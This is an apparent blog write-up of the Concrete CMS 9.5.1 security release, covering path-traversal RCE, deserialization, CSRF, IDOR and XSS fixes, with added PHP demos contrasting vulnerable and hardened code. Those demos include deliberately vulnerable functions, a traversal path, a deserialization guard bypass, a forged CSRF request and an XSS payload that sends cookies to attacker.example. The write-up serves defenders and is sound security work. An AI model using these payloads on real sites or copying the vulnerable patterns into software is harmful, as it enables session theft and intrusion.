Concrete CMS 9.5.1 Security Release: 35 Vulnerabilities Resolved

May 27, 2026
by lisan

Version 9.5.1 of Concrete CMS delivers a substantial security hardening update for the platform, resolving 35 vulnerabilities across core CMS functionality, package management, authentication flows, file handling, administrative workflows, and authorization controls.

The release addresses vulnerabilities ranging from low-severity CSRF flaws to authenticated remote code execution vulnerabilities with CVSS v4 scores as high as 9.4. All users are strongly encouraged to upgrade immediately.

The official release notes are available from Concrete CMS 9.5.1 Release Notes.

Why This Release Matters

This release stands out not only because of the number of vulnerabilities resolved, but because several findings affected highly trusted administrative workflows inside the CMS.

The most significant issues involved:

  • Authenticated remote code execution
  • Package installation and upgrade security
  • Missing authorization checks
  • Insecure direct object references (IDOR)
  • Stored and reflected cross-site scripting (XSS)
  • Broad CSRF exposure across administrative endpoints

While many of the higher-severity vulnerabilities required elevated privileges, they still represent meaningful operational risk in real-world environments where:

  • multiple administrators exist,
  • third-party integrators have backend access,
  • administrative sessions may become compromised,
  • or staging and production permissions are loosely managed.

The release also highlights the importance of defense-in-depth within CMS ecosystems, particularly around package management, legacy controllers, and object-level authorization enforcement.

Critical Severity Vulnerability

Path Traversal to Remote Code Execution (CVSS 9.4 — Critical)

The most severe issue fixed in 9.5.1 involved insufficient sanitization of path traversal sequences in page type composer layouts.

An authenticated administrator with composer editing privileges could abuse template handling to include arbitrary files readable by the web server process. On its own that is a local file inclusion; combined with weak extension-based upload validation, which made it possible to get a file containing PHP code onto disk past the upload filter, it became a viable path to authenticated remote code execution.

The issue demonstrates a classic vulnerability chain, in the order an attacker would run it:

  1. upload abuse: placing a file that carries PHP code on disk under an extension the upload check accepts,
  2. arbitrary file inclusion: pointing the layout path at that file with a traversal sequence,
  3. and execution of the attacker-controlled code inside the web server's PHP runtime.

Although exploitation required privileged access, the impact potential justified the release’s only Critical severity rating.

This vulnerability was reported by Yonatan Drori (Tenzai).
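The two halves of that chain, path confinement and upload extension checking, are shown below as an added example in PHP. This is not Concrete CMS code and does not reproduce the fixed controller; the layout directory, file names and the `vulnerableLayoutPath`, `safeLayoutPath` and `uploadExtensionAllowed` functions are constructed for the demonstration, which creates its own temporary files so it runs offline.

```php
<?php
// Added example, not Concrete CMS code: confining a layout/template path to its
// base directory before include(), plus an upload extension check that looks at
// every extension segment. All paths and names below are constructed for the demo.
declare(strict_types=1);

// Constructed sandbox: one legitimate layout inside the base directory and a
// decoy PHP file outside it, so the script runs offline.
$base = sys_get_temp_dir() . '/layouts_' . bin2hex(random_bytes(4));
mkdir($base . '/composer', 0700, true);
file_put_contents($base . '/composer/two_column.php', "<?php echo 'two_column layout';\n");
$outside = sys_get_temp_dir() . '/planted_' . bin2hex(random_bytes(4)) . '.php';
file_put_contents($outside, "<?php echo 'file outside the layout directory';\n");

// Vulnerable: a stored layout name is spliced into a path without normalisation,
// so a value containing "../" escapes the layout directory.
function vulnerableLayoutPath(string $base, string $layout): string
{
    return $base . '/composer/' . $layout . '.php';
}

// Hardened: layout names are identifiers, so reject anything else up front; then
// resolve with realpath() and require the result to stay under the base directory
// (a second line of defence against symlinks or a missed character class).
function safeLayoutPath(string $base, string $layout): ?string
{
    if (!preg_match('/^[A-Za-z0-9_]+$/', $layout)) {
        return null;
    }
    $root = realpath($base . '/composer');
    if ($root === false) {
        return null;
    }
    $candidate = realpath($root . '/' . $layout . '.php');
    if ($candidate === false) {
        return null;
    }
    // Compare with a trailing separator so "/x/composer_evil" is not accepted as
    // a prefix match of "/x/composer".
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Upload side of the chain: allow-list every extension segment, not just the last
// one, so "shell.php.jpg" and "shell.phtml" are both refused.
function uploadExtensionAllowed(string $filename, array $allow = ['jpg', 'jpeg', 'png', 'gif', 'webp', 'pdf']): bool
{
    $parts = explode('.', strtolower(basename($filename)));
    if (count($parts) < 2 || $parts[0] === '') {
        return false;   // no extension at all, or a dotfile
    }
    foreach (array_slice($parts, 1) as $ext) {
        if (!in_array($ext, $allow, true)) {
            return false;
        }
    }
    return true;
}

// Traversal value an attacker would store as the layout name: climb to the
// filesystem root, then descend to the planted file (minus the ".php" the code appends).
$traversal = str_repeat('../', 12) . ltrim(substr($outside, 0, -4), '/');

printf("vulnerable resolves to: %s\n", realpath(vulnerableLayoutPath($base, $traversal)));
printf("hardened, traversal name: %s\n", var_export(safeLayoutPath($base, $traversal), true));
printf("hardened, real layout:   %s\n", var_export(safeLayoutPath($base, 'two_column'), true));
foreach (['photo.jpg', 'shell.php.jpg', 'shell.phtml', '.htaccess'] as $f) {
    printf("upload %-14s allowed: %s\n", $f, var_export(uploadExtensionAllowed($f), true));
}

// Clean up the constructed files.
unlink($base . '/composer/two_column.php');
rmdir($base . '/composer');
rmdir($base);
unlink($outside);
```

The identifier check alone stops the traversal; the `realpath()` prefix comparison is kept because it also catches symlinks and any future relaxation of the character class. The same confinement applies to the protected-file delivery path discussed later on this page.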

High Severity Vulnerabilities

Insecure Deserialization in ExpressEntryList (CVSS 8.9 — High)

A high-severity deserialization flaw affected the ExpressEntryList block controller.

Researchers discovered that a guard intended to keep untrusted data away from unserialize() could be bypassed through REST API request parsing. The guard relied on a strict Boolean comparison that a form-encoded request could never satisfy, because PHP delivers form values as strings; a JSON request body, however, decodes to a native Boolean true and passes the check.

A rogue administrator could therefore store a malicious serialized payload in block data, and it would be unserialized, running any gadget chain it carried, when the block was later viewed or edited.

Although exploitation required elevated permissions, insecure deserialization vulnerabilities remain among the most dangerous classes of application flaws because they can lead directly to arbitrary code execution inside the PHP runtime.

This issue was reported by Nguyễn Văn Thiện.
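The transport-dependent guard described above, reconstructed as an added example in PHP (not Concrete CMS code, and not the actual ExpressEntryList controller): the `AuditProbe` class, the `use_serialized` flag and the `payload` field are constructed stand-ins, and the probe only counts instantiations where a real gadget chain would do damage.

```php
<?php
// Added example, not Concrete CMS code. It reproduces the general pattern the
// advisory describes: a guard that only reaches unserialize() when a request flag
// is strictly boolean true. Class, field and flag names are constructed for the demo.
declare(strict_types=1);

// Stand-in for a gadget class. A real chain would do damage in __wakeup() or
// __destruct(); this one only counts how often unserialize() instantiated it.
final class AuditProbe
{
    public static int $wakeups = 0;
    public string $note = 'constructed payload';

    public function __wakeup(): void
    {
        self::$wakeups++;
    }
}

// The same logical request as a form-encoded body and as a JSON body.
$payload  = serialize(new AuditProbe());
$formBody = 'use_serialized=true&payload=' . urlencode($payload);
$jsonBody = json_encode(['use_serialized' => true, 'payload' => $payload]);

function parseForm(string $body): array
{
    parse_str($body, $out);          // every scalar arrives as a string
    return $out;
}

function parseJson(string $body): array
{
    return json_decode($body, true, 512, JSON_THROW_ON_ERROR);   // true stays a bool
}

// Vulnerable guard: the strict comparison makes the branch unreachable from the
// block's edit form, but a JSON body decodes to a native bool and walks right in.
function loadBlockDataVulnerable(array $request): array
{
    if (($request['use_serialized'] ?? null) === true) {
        return (array) unserialize((string) $request['payload']);   // magic methods run here
    }
    return ['payload' => (string) ($request['payload'] ?? '')];
}

// Hardened: never hand user-controlled bytes to unserialize() with classes
// enabled. If legacy serialized strings must still be read, allowed_classes=false
// yields __PHP_Incomplete_Class objects and no __wakeup/__destruct executes.
function loadBlockDataHardened(array $request): array
{
    $payload = (string) ($request['payload'] ?? '');
    $data = @unserialize($payload, ['allowed_classes' => false]);
    return $data === false ? ['payload' => $payload] : (array) $data;
}

AuditProbe::$wakeups = 0;
loadBlockDataVulnerable(parseForm($formBody));
$afterForm = AuditProbe::$wakeups;          // flag was the string "true": guard held
loadBlockDataVulnerable(parseJson($jsonBody));
$afterJson = AuditProbe::$wakeups;          // flag was bool true: guard bypassed
loadBlockDataHardened(parseJson($jsonBody));
$afterHardened = AuditProbe::$wakeups;      // no class instantiated on either transport
printf("wakeups after form=%d, after json=%d, after hardened=%d\n", $afterForm, $afterJson, $afterHardened);
```

The lesson is not that the comparison was too strict, but that a guard keyed on request type is a fragile substitute for not deserializing user-controlled data at all; JSON for structured block settings removes the class instantiation entirely.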

Package Management and Update Workflow Vulnerabilities

Several additional High severity findings centered around package management and update operations.

Multiple endpoints responsible for:

  • downloading marketplace packages,
  • preparing package upgrades,
  • installing packages,
  • upgrading packages,
  • and executing core CMS updates

were missing CSRF protections.

In isolation, CSRF vulnerabilities are often considered lower risk. However, when those vulnerabilities affect package installation and upgrade functionality, the potential impact increases substantially because those workflows interact directly with executable application code.

An attacker who could get an authenticated administrator's browser to submit a crafted request, for example through an auto-submitting form on a page the administrator visits, could trigger any of these operations (marketplace downloads, remote package upgrades, package installation and upgrade execution, or core update handling) with that administrator's session and privileges.

These vulnerabilities were primarily reported by maru1009.

Privilege Escalation Through Bulk User Assignment

Another High severity issue involved missing authorization checks within bulk user assignment functionality.

Under certain permission configurations, authenticated users with access to the dashboard page could manipulate group membership assignments — including membership in administrative groups.

This created a potential privilege escalation pathway capable of granting elevated administrative access or removing legitimate administrators from privileged groups.

This issue was reported by Vincent55.

Stored Cross-Site Scripting Vulnerabilities

Several High severity XSS vulnerabilities were also resolved in this release.

These included:

  • OAuth integration name injection,
  • unsanitized height parameter handling,
  • and administrative workflow rendering flaws.

While exploitation generally required authenticated backend access, stored XSS vulnerabilities inside CMS administrative environments remain particularly dangerous because they can enable:

  • session theft,
  • credential capture,
  • administrative impersonation,
  • and secondary compromise of connected systems.

These vulnerabilities were reported by:

  • Yonatan Drori (Tenzai)
  • and Alfin Joseph.
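Two of the vectors named above, a display name rendered into HTML and a height value rendered into an attribute, shown as an added example in PHP. This is not Concrete CMS code; the markup, the `renderIntegration*` functions and the attacker-controlled sample values are constructed for the demonstration.

```php
<?php
// Added example, not Concrete CMS code: output handling for two of the vectors
// named above, a display name rendered into HTML and a height setting rendered
// into an attribute. The markup and sample values are constructed for the demo.
declare(strict_types=1);

// Vulnerable: stored values concatenated straight into markup. Whoever controls
// the name or height controls the HTML every administrator who views it receives.
function renderIntegrationVulnerable(string $name, string $height): string
{
    return '<div class="oauth-provider" style="height:' . $height . 'px">'
         . '<a href="/login/oauth" title="' . $name . '">' . $name . '</a></div>';
}

// Encoder for HTML text and quoted-attribute contexts.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// A height is a bounded integer, so validate it as one instead of escaping it;
// anything else falls back to a default.
function safeHeight(string $raw, int $default = 200, int $min = 10, int $max = 4000): int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? $default : $v;
}

function renderIntegrationHardened(string $name, string $height): string
{
    return sprintf(
        '<div class="oauth-provider" style="height:%dpx"><a href="/login/oauth" title="%s">%s</a></div>',
        safeHeight($height),
        e($name),
        e($name)
    );
}

// Self-check used by the demo: the hardened output must contain no tag other than
// the two the template itself emits (opening and closing div and a).
function onlyTemplateTags(string $html): bool
{
    return preg_match_all('/<\s*\/?\s*([a-z][a-z0-9]*)/i', $html, $m) === 4
        && array_diff(array_map('strtolower', $m[1]), ['div', 'a']) === [];
}

// Constructed attacker-controlled values: a name that closes the attribute and
// injects an event handler, and a "height" that breaks out of its attribute.
$name   = 'Acme Login"><img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';
$height = '300" onmouseover="alert(1)';

echo renderIntegrationVulnerable($name, $height), "\n";
echo renderIntegrationHardened($name, $height), "\n";
printf("hardened output contains only template tags: %s\n",
    var_export(onlyTemplateTags(renderIntegrationHardened($name, $height)), true));
```

Encoding is chosen per context: the name goes through `htmlspecialchars` for text and attribute positions, while the height is validated as an integer because no amount of escaping makes `300" onmouseover=` a sensible height. A Content-Security-Policy without `unsafe-inline` is the complementary defence for the administrative UI.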

Authorization and Access Control Weaknesses

A major theme throughout the 9.5.1 release is improved enforcement of authorization boundaries.

Multiple vulnerabilities involved insecure direct object references (IDOR) or missing authorization checks affecting:

  • conversations,
  • file usage metadata,
  • calendar events,
  • Express form submissions,
  • survey functionality,
  • and restricted page metadata.

In some cases, unauthenticated attackers could enumerate or access:

  • restricted conversation messages,
  • file attachment information,
  • internal site structure data,
  • calendar event details,
  • or unpublished content metadata.

Several of these findings demonstrate how small authorization gaps across legacy or auxiliary endpoints can accumulate into meaningful information disclosure risks.

Researchers credited with these findings include:

  • Winston Crooker
  • Tristan Madani
  • Eldudareeno
  • Youssef Eid
  • Zer0daySec
  • and lalalala5678.
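The privilege escalation through bulk user assignment and the IDOR findings above share one root cause: an endpoint-level check ("may this user open this page?") standing in for an object-level one ("may this user touch this specific group or record?"). The added PHP example below illustrates both sides; it is not Concrete CMS code and does not model its permission system. The `Group`, `User`, `Message` and `Policy` classes and the `bulkAssign*` and `readMessageHardened` functions are constructed for the demonstration, and PHP 8 is assumed for constructor property promotion.

```php
<?php
// Added example, not Concrete CMS code: object-level authorization for a bulk
// group-assignment operation and for reading a single record by ID. The in-memory
// model (Group, User, Message, Policy) is constructed for the demo; PHP 8 assumed.
declare(strict_types=1);

final class Group
{
    /** @param int[] $editors user IDs allowed to change this group's membership */
    public function __construct(public int $id, public string $name, public array $editors) {}
}

final class User
{
    public function __construct(public int $id, public bool $canAccessDashboard, public array $groupIds = []) {}
}

final class Message
{
    public function __construct(public int $id, public string $body, public bool $isPublic, public int $ownerId) {}
}

final class Policy
{
    /** @param array<int, Group> $groups */
    public function __construct(private array $groups) {}

    public function canEditGroup(User $actor, int $groupId): bool
    {
        $g = $this->groups[$groupId] ?? null;
        return $g !== null && in_array($actor->id, $g->editors, true);
    }
}

// Vulnerable: only the endpoint-level check ("may this user open the dashboard
// page?"). The group IDs in the request are trusted as-is.
function bulkAssignVulnerable(User $actor, array $targets, array $groupIds): void
{
    if (!$actor->canAccessDashboard) {
        throw new RuntimeException('forbidden');
    }
    foreach ($targets as $t) {
        foreach ($groupIds as $gid) {
            $t->groupIds[] = $gid;
        }
    }
}

// Hardened: authorize every referenced group before the first write and fail
// closed, so a request mixing allowed and forbidden groups changes nothing.
function bulkAssignHardened(Policy $p, User $actor, array $targets, array $groupIds): void
{
    if (!$actor->canAccessDashboard) {
        throw new RuntimeException('forbidden');
    }
    foreach ($groupIds as $gid) {
        if (!$p->canEditGroup($actor, $gid)) {
            throw new RuntimeException("forbidden: no edit right on group $gid");
        }
    }
    foreach ($targets as $t) {
        foreach ($groupIds as $gid) {
            $t->groupIds[] = $gid;
        }
    }
}

// The IDOR side of the same rule: an ID taken from the request is a claim, not a
// grant. Look the object up, then check the actor's right to that object, and
// answer "not found" for both missing and forbidden so IDs cannot be enumerated.
function readMessageHardened(User $actor, array $messages, int $id): ?string
{
    $m = $messages[$id] ?? null;
    if ($m === null || (!$m->isPublic && $m->ownerId !== $actor->id)) {
        return null;
    }
    return $m->body;
}

$policy = new Policy([
    1 => new Group(1, 'Administrators', [1]),
    2 => new Group(2, 'Editors', [1, 7]),
]);

// An editor who may open the dashboard page but may only manage group 2 tries to
// add themself to Administrators (group 1).
$editor = new User(7, true, [2]);
bulkAssignVulnerable($editor, [$editor], [1]);
printf("vulnerable: user 7 is now in groups %s\n", implode(',', $editor->groupIds));

$editor = new User(7, true, [2]);
try {
    bulkAssignHardened($policy, $editor, [$editor], [2, 1]);
} catch (RuntimeException $e) {
    printf("hardened: %s; groups unchanged: %s\n", $e->getMessage(), implode(',', $editor->groupIds));
}

$messages = [10 => new Message(10, 'public notice', true, 1), 11 => new Message(11, 'restricted thread', false, 1)];
printf("user 7 reads message 10: %s\n", var_export(readMessageHardened($editor, $messages, 10), true));
printf("user 7 reads message 11: %s\n", var_export(readMessageHardened($editor, $messages, 11), true));
```

Note that the hardened bulk handler checks all groups before writing any: validating inside the write loop would leave a half-applied assignment behind when the forbidden group is not the first in the list.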

Administrative CSRF Hardening

Concrete CMS 9.5.1 also resolves a large cluster of lower-severity CSRF vulnerabilities affecting backend administrative controllers.

The affected endpoints included operations such as:

  • log deletion,
  • bulk page actions,
  • file rescans,
  • event duplication,
  • Express association reordering,
  • file favoriting,
  • and file version approval.

Individually, many of these vulnerabilities carried relatively low severity ratings. Collectively, however, they represent a broader hardening effort focused on legacy administrative functionality and state-changing operations.

This class of remediation work is often less visible than high-profile RCE fixes, but it plays an important role in improving long-term platform resilience.

Most of these CSRF findings were reported by Yonatan Drori (Tenzai), with additional contributions from Winston Crooker.
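The package-management CSRF findings earlier on this page and the lower-severity administrative CSRF cluster here are the same defect with different blast radius, so one added example covers both: a session-bound, action-bound token checked by a state-changing handler, in PHP. This is not Concrete CMS code and does not show its token helper; the `CsrfTokens` class, the `installPackage*` handlers, the `csrf_token` field name and the session layout are constructed for the demonstration, and PHP 8 is assumed for `str_starts_with`.

```php
<?php
// Added example, not Concrete CMS code: a session-bound, action-bound CSRF token
// for state-changing administrative endpoints (package install/upgrade, log
// deletion, version approval and the like). Names such as installPackage*,
// csrf_token and the session layout are constructed for the demo; PHP 8 assumed.
declare(strict_types=1);

final class CsrfTokens
{
    private string $sessionSecret;

    // The secret lives in the server-side session; a cross-site page never sees it.
    public function __construct(?string $sessionSecret = null)
    {
        $this->sessionSecret = $sessionSecret ?? bin2hex(random_bytes(32));
    }

    // token = HMAC-SHA256(secret, action | issued_at) . issued_at
    public function generate(string $action, ?int $now = null): string
    {
        $ts = (string) ($now ?? time());
        return hash_hmac('sha256', $action . '|' . $ts, $this->sessionSecret) . '.' . $ts;
    }

    public function validate(string $action, string $token, int $maxAge = 3600, ?int $now = null): bool
    {
        $parts = explode('.', $token, 2);
        if (count($parts) !== 2 || !ctype_digit($parts[1])) {
            return false;
        }
        [$mac, $ts] = $parts;
        if ((($now ?? time()) - (int) $ts) > $maxAge) {
            return false;
        }
        $expected = hash_hmac('sha256', $action . '|' . $ts, $this->sessionSecret);
        return hash_equals($expected, $mac);   // constant-time comparison
    }
}

// Vulnerable: any request carrying the admin's session cookie triggers the install,
// including one a cross-site page auto-submitted on their behalf.
function installPackageVulnerable(array $session, array $post, callable $install): string
{
    if (empty($session['is_admin'])) {
        return 'forbidden';
    }
    $install((string) $post['pkg']);
    return 'installed';
}

// Hardened: POST only, same-origin check as defence in depth, then an action-bound
// token. A cross-site form carries the cookie but cannot read or mint the token.
function installPackageHardened(array $session, array $post, array $headers, string $method,
                                CsrfTokens $tokens, callable $install, string $siteOrigin): string
{
    if (empty($session['is_admin'])) {
        return 'forbidden';
    }
    if ($method !== 'POST') {
        return 'method not allowed';
    }
    $origin = $headers['Origin'] ?? $headers['Referer'] ?? '';
    if ($origin !== '' && $origin !== $siteOrigin && !str_starts_with($origin, $siteOrigin . '/')) {
        return 'cross-origin request rejected';
    }
    if (!$tokens->validate('install_package', (string) ($post['csrf_token'] ?? ''))) {
        return 'missing or invalid token';
    }
    $install((string) $post['pkg']);
    return 'installed';
}

$tokens   = new CsrfTokens();
$session  = ['is_admin' => true];
$site     = 'https://cms.example';
$installs = [];
$install  = function (string $pkg) use (&$installs): void { $installs[] = $pkg; };

// Forged request: the admin's browser submits it from attacker.example, so the
// session cookie is present but no token is.
$forged = ['pkg' => 'planted_package'];
printf("vulnerable, forged: %s\n", installPackageVulnerable($session, $forged, $install));
printf("hardened, forged:   %s\n", installPackageHardened($session, $forged, ['Origin' => 'https://attacker.example'], 'POST', $tokens, $install, $site));

// Legitimate submission from the admin UI with the token the page embedded.
$legit = ['pkg' => 'trusted_package', 'csrf_token' => $tokens->generate('install_package')];
printf("hardened, legit:    %s\n", installPackageHardened($session, $legit, ['Origin' => $site], 'POST', $tokens, $install, $site));

// A valid token minted for a different action does not transfer.
$wrong = ['pkg' => 'planted_package', 'csrf_token' => $tokens->generate('delete_log')];
printf("hardened, wrong action token: %s\n", installPackageHardened($session, $wrong, ['Origin' => $site], 'POST', $tokens, $install, $site));
printf("packages actually installed: %s\n", implode(',', $installs));
```

Binding the token to the action name is what turns a single leaked token into a single leaked action rather than a skeleton key for every administrative endpoint; the Origin check is deliberately secondary, since some privacy configurations strip both Origin and Referer and the handler must not fall open when they are absent.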

Additional Security Improvements

The release also addressed several other important security weaknesses, including:

  • OAuth account status bypasses,
  • unauthorized file access,
  • reflected XSS in legacy pagination,
  • SSRF exposure in the RSS Displayer block,
  • file permission bypasses through conversation attachments,
  • password change workflow weaknesses,
  • and stored XSS through page naming and external link aliases.

While many of these vulnerabilities were lower severity individually, they collectively reduced attack surface across multiple subsystems within the CMS.

Researchers contributing to these findings included:

  • 0x4c616e
  • Tristan Madani
  • Yonatan Drori (Tenzai)
  • and others already credited throughout the release.

Operational Guidance for Administrators

Organizations running Concrete CMS should prioritize upgrading to version 9.5.1 as soon as operationally feasible.

Environments at elevated risk include those with:

  • multiple backend administrators,
  • marketplace connectivity enabled,
  • delegated editorial workflows,
  • third-party package usage,
  • public-facing forms,
  • or extensive custom integrations.

Recommended Actions

Administrators should consider the following actions alongside upgrading:

  • Enforce MFA for all privileged accounts
  • Review administrator and package installation permissions
  • Audit marketplace-connected environments
  • Reassess third-party package trust relationships
  • Review Express entity and OAuth integrations
  • Audit file access and storage configurations
  • Restrict unnecessary administrative access paths

Sites storing sensitive or private files should also ensure protected files are stored outside the public web root so authorization checks are consistently enforced during file delivery.

Researcher Acknowledgements

Concrete CMS credited a broad group of independent security researchers who responsibly disclosed vulnerabilities through HackerOne.

Researchers credited in the 9.5.1 release include:

  • Yonatan Drori (Tenzai)
  • maru1009
  • Winston Crooker
  • Tristan Madani
  • Nguyễn Văn Thiện
  • Eldudareeno
  • Vincent55
  • Alfin Joseph
  • Youssef Eid
  • Zer0daySec
  • lalalala5678
  • 0x4c616e

The number and diversity of reports in this release reflect increasing scrutiny of the platform’s attack surface across package management, authorization boundaries, administrative workflows, legacy controllers, and file handling systems.

That level of external review is ultimately healthy for the long-term security maturity of the ecosystem.

Final Thoughts

Concrete CMS 9.5.1 is not a routine maintenance release.

It is a broad security hardening update that addresses weaknesses across:

  • package management,
  • authorization enforcement,
  • file handling,
  • authentication,
  • administrative workflows,
  • and legacy controller behavior.

Organizations running older versions should treat this as a high-priority upgrade cycle.

For mature CMS platforms, some of the most serious risks are not always unauthenticated attacks from anonymous users. Increasingly, the more dangerous vulnerabilities are those that allow trusted backend access to become privilege escalation, persistent compromise, or remote code execution.

This release meaningfully reduces that risk surface and represents an important security milestone for the platform.

Image source

Lewis, N. (n.d.). Indigo bunting [Photograph]. National Park Service. U.S. Fish & Wildlife Service. https://www.fws.gov/media/indigo-bunting-13